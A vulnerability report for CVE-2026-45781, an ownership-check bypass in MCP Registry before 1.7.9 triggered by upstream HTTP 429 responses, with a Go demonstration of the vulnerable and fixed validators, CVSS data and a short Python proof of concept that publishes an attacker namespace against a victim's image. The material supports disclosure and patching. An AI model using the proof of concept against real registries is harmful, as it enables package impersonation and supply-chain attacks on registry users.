Security Vulnerability Report
CVE-2026-45781 CVSS 3.5 LOW

Published: 2026-05-14 21:16:48
Last Modified: 2026-05-14 21:16:48

Description

The MCP Registry provides MCP clients with a list of MCP servers, like an app store for MCP servers. Prior to 1.7.9, OCI ownership validation skips the label-match check when the upstream OCI registry returns HTTP 429, letting any authenticated publisher bind their io.github.<user>/* namespace to OCI images they do not control. internal/validators/registries/oci.go:104-119 fails open on http.StatusTooManyRequests: when the registry's anonymous fetch to the upstream OCI registry is rate-limited, ValidateOCI returns nil and the publish is accepted without ever running the io.modelcontextprotocol.server.name label-match check at lines 122-141. That label check is the only cross-system ownership proof the registry applies to OCI packages; every other registry type (NPM, PyPI, NuGet, MCPB) treats a non-200 upstream response as a hard error. This vulnerability is fixed in 1.7.9.
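The fail-open path and its fix, shown side by side as an added Go example. This is not the project's code: the upstream OCI registry is replaced by an httptest mock that serves a cut-down image config document at a hypothetical /v2/<repo>/config/<ref> path (the real validator resolves the manifest and then the config blob), and the function names ValidateOCIVulnerable, ValidateOCIFixed, fetchLabels and newMockUpstream are this example's own. The vulnerable variant returns nil on a 429 before the label check runs; the fixed variant applies the non-200-is-an-error policy the other validators already use.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
)

// ServerNameLabel is the image label the registry uses as ownership proof.
const ServerNameLabel = "io.modelcontextprotocol.server.name"

// ociConfig is a cut-down stand-in for the OCI image config document.
type ociConfig struct {
	Config struct {
		Labels map[string]string `json:"Labels"`
	} `json:"config"`
}

// fetchLabels is the anonymous upstream fetch (mock path, see lead-in). A
// non-200 status is handed back unchanged so each policy below decides itself.
func fetchLabels(upstream, repo, ref string) (map[string]string, int, error) {
	resp, err := http.Get(fmt.Sprintf("%s/v2/%s/config/%s", upstream, repo, ref))
	if err != nil {
		return nil, 0, err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return nil, resp.StatusCode, nil
	}
	var cfg ociConfig
	if err := json.NewDecoder(resp.Body).Decode(&cfg); err != nil {
		return nil, resp.StatusCode, err
	}
	return cfg.Config.Labels, resp.StatusCode, nil
}

// validateLabel is the cross-system ownership proof: the image must carry the
// server-name label and it must equal the name being published.
func validateLabel(labels map[string]string, serverName string) error {
	got, ok := labels[ServerNameLabel]
	if !ok {
		return fmt.Errorf("image has no %s label", ServerNameLabel)
	}
	if got != serverName {
		return fmt.Errorf("label %s=%q does not match server name %q", ServerNameLabel, got, serverName)
	}
	return nil
}

// ValidateOCIVulnerable has the pre-1.7.9 shape: a 429 from upstream returns
// nil, so the publish is accepted without the label check ever running.
func ValidateOCIVulnerable(upstream, repo, ref, serverName string) error {
	labels, status, err := fetchLabels(upstream, repo, ref)
	if err != nil {
		return err
	}
	if status == http.StatusTooManyRequests {
		return nil // fail open: ownership was never proven
	}
	if status != http.StatusOK {
		return fmt.Errorf("upstream returned HTTP %d", status)
	}
	return validateLabel(labels, serverName)
}

// ValidateOCIFixed treats every non-200 upstream response as a hard error, the
// policy the NPM, PyPI, NuGet and MCPB validators already apply.
func ValidateOCIFixed(upstream, repo, ref, serverName string) error {
	labels, status, err := fetchLabels(upstream, repo, ref)
	if err != nil {
		return err
	}
	if status != http.StatusOK {
		return fmt.Errorf("upstream returned HTTP %d; ownership cannot be verified", status)
	}
	return validateLabel(labels, serverName)
}

// newMockUpstream is a constructed fake OCI registry: when rateLimited it
// answers 429 to everything, otherwise it serves one image labelled for owner.
func newMockUpstream(rateLimited bool, owner string) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if rateLimited {
			w.WriteHeader(http.StatusTooManyRequests)
			return
		}
		var cfg ociConfig
		cfg.Config.Labels = map[string]string{ServerNameLabel: owner}
		_ = json.NewEncoder(w).Encode(cfg)
	}))
}

func main() {
	attacker := "io.github.attacker/hijack"
	healthy := newMockUpstream(false, "io.github.victim/legit")
	limited := newMockUpstream(true, "")
	defer healthy.Close()
	defer limited.Close()
	fmt.Println("healthy, vulnerable:", ValidateOCIVulnerable(healthy.URL, "victim/legit", "latest", attacker))
	fmt.Println("429, vulnerable:", ValidateOCIVulnerable(limited.URL, "victim/legit", "latest", attacker))
	fmt.Println("429, fixed:", ValidateOCIFixed(limited.URL, "victim/legit", "latest", attacker))
}
```

With a healthy upstream both variants reject the attacker because the label names the victim; only when the upstream answers 429 do they diverge, which is the whole bug: the one branch where the proof cannot be obtained must be a hard failure, not an implicit pass.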

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available yet (NVD status: Received). Affected range, taken from the description:

MCP Registry < 1.7.9 (fixed in 1.7.9)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Conceptual PoC for CVE-2026-45781.
# This script demonstrates the logic where a rate limit (429) at the upstream
# OCI registry leads to an ownership-check bypass in MCP Registry < 1.7.9.
# In a real scenario, the attacker would flood the upstream registry or rely
# on existing limits so that the registry's anonymous fetch is answered 429.
# The endpoint path, payload field names and token handling below are
# illustrative stand-ins, not the registry's real publish API.


def publish_mcp_package(target_registry, namespace, malicious_image_uri,
                        publisher_token="attacker_auth_token"):
    """
    Simulates publishing a package to MCP Registry and reports whether the
    publish was accepted. Returns True when the registry answers HTTP 200.
    """
    payload = {
        "name": f"{namespace}/malicious-package",
        "oci_image": malicious_image_uri,
        "publisher_token": publisher_token,
    }
    # The MCP Registry attempts to validate the OCI image upstream by fetching
    # it anonymously and comparing the io.modelcontextprotocol.server.name
    # label to the name being published. If the upstream fetch returns 429,
    # the vulnerable version skips that check and accepts the publish.
    response = requests.post(f"{target_registry}/api/publish", json=payload, timeout=30)
    if response.status_code == 200:
        print("[+] Package published successfully (Validation Bypassed)")
        return True
    print(f"[-] Package publish failed (HTTP {response.status_code})")
    return False


if __name__ == "__main__":
    # Usage: bind the attacker's io.github namespace to an image they do not own.
    publish_mcp_package("http://mcp-registry.com", "io.github.attacker",
                        "ghcr.io/victim/legit-image:latest")
```

References

https://github.com/modelcontextprotocol/registry/security/advisories/GHSA-2v5f-5r6w-p67r (GitHub Security Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-45781",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T21:16:48.480",
    "lastModified": "2026-05-14T21:16:48.480",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The MCP Registry provides MCP clients with a list of MCP servers, like an app store for MCP servers. Prior to 1.7.9, OCI ownership validation skips label-match check when upstream OCI registry returns HTTP 429, letting any authenticated publisher bind their io.github.<user>/* namespace to OCI images they do not control. internal/validators/registries/oci.go:104-119 fails open on http.StatusTooManyRequests: when the registry's anonymous fetch to the upstream OCI registry is rate-limited, ValidateOCI returns nil and the publish is accepted without ever running the io.modelcontextprotocol.server.name label-match check at lines 122-141. That label check is the only cross-system ownership proof the registry applies to OCI packages — every other registry type (NPM, PyPI, NuGet, MCPB) treats a non-200 upstream response as a hard error. This vulnerability is fixed in 1.7.9."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-636"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/modelcontextprotocol/registry/security/advisories/GHSA-2v5f-5r6w-p67r",
        "source": "[email protected]"
      }
    ]
  }
}
```